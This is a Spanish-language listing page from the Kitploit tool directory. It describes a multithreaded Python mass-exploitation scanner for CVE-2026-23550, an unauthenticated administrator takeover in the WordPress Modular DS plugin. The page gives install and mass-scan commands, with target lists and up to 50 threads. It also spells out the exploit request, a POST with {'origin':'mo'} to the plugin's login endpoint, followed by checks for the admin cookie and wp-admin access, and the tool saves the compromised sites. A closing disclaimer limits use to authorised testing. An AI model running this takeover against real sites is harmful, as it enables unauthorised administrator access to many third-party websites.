Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mass-CVE-2026-23550-Exploit — Escáner multihilo en Python para CVE-2026-23550, que detecta la toma de control de administrador no autenticada en el plugin Modular DS de WordPress con verificación completa de wp-admin. | Kitploit
Herramientas/GitHubGitHub/dzmind2312/mass-cve-2026-23550-exploit
ReconocimientoEscáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubdzmind2312/mass-cve-2026-23550-exploit

Mass-CVE-2026-23550-Exploit

Escáner multihilo en Python para CVE-2026-23550, que detecta la toma de control de administrador no autenticada en el plugin Modular DS de WordPress con verificación completa de wp-admin.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
2hace 6 mesesAún no revisado
Compartir

🔥 CVE-2026-23550 Escáner Modular DS

Escáner Python multi-hilo para la vulnerabilidad CVE-2026-23550 (CVSS 10.0) del plugin Modular DS de WordPress ≤2.5.1 que afecta a más de 40k sitios. Detecta la toma de control de administrador no autenticada mediante la omisión de getLogin() con verificación completa de acceso a wp-admin. Características ✨

root@kitploit:~
🔥 Detección completa de acceso de administrador (cookies + verificación de wp-admin)

⚡ Multi-hilo (hasta 50+ objetivos concurrentes)

📊 Barra de progreso animada con rich

🎨 Tabla resumen con colores

💾 Guardado automático de objetivos vulnerables en archivo

🚀 Timeouts y manejo de errores listos para producción

Instalación 🚀

bash pip3 install requests rich chmod +x modular_ds.py

Uso 📋

bash

Escaneo masivo (50 hilos)

python3 modular_ds.py -l targets.txt -t 50 -o bounty_vulns.txt

Reconocimiento para bug bounty

python3 modular_ds.py -l univ-oran1.txt -t 20

Predeterminado (20 hilos, salida vulns.txt)

python3 modular_ds.py -l targets.txt

Formato de targets.txt:

text https://target1.com http://site2.com

Omitir comentarios

https://sub.domain.tld

Argumentos Flag Descripción Predeterminado -l, --list Obligatorio Archivo de objetivos (1 URL/línea) - -t, --threads Máximo de hilos concurrentes 20 -o, --output Archivo de salida de objetivos vulnerables vulns.txt Salida de ejemplo 🖥️

text 🔥 CVE-2026-23550 Escáner Modular DS 🔥 Objetivos: 247 | Hilos: 50 | Salida: bounty_vulns.txt

⠋ Escaneando Modular DS... 127/247 (51%) ✅ VULNERABLE: https://target.com 🔥 ACCESO COMPLETO DE ADMINISTRADOR: target.com

┌─────────────┬─────────────────────────────────────┬────────────┐ │ Estado │ Objetivo │ Detalles │ ├─────────────┼─────────────────────────────────────┼────────────┤ │ 🔥 COMPLETO │ https://target.com │ 3 cookies │ └─────────────┴─────────────────────────────────────┴────────────┘

💾 4 objetivos vulnerables → bounty_vulns.txt

Lógica de detección 🔍

text

  1. POST /wp-content/plugins/modular-ds/api/modular-connector/login {"origin":"mo"}
  2. ✅ Comprobar cookie de administrador wordpress_logged_in_*
  3. ✅ Verificar acceso al panel /wp-admin/
  4. 💾 Guardar objetivos con ACCESO COMPLETO DE ADMINISTRADOR confirmado

Uso legal y ético ⚖️

text ⚠️ ESTRICTAMENTE PARA: ✅ Pruebas de penetración autorizadas ✅ Programas de bug bounty
✅ Laboratorios de investigación de seguridad ✅ Infraestructura propia

❌ NUNCA usar en objetivos no autorizados

Requisitos 📦

text requests>=2.31.0 rich>=13.0.0

Descargar herramienta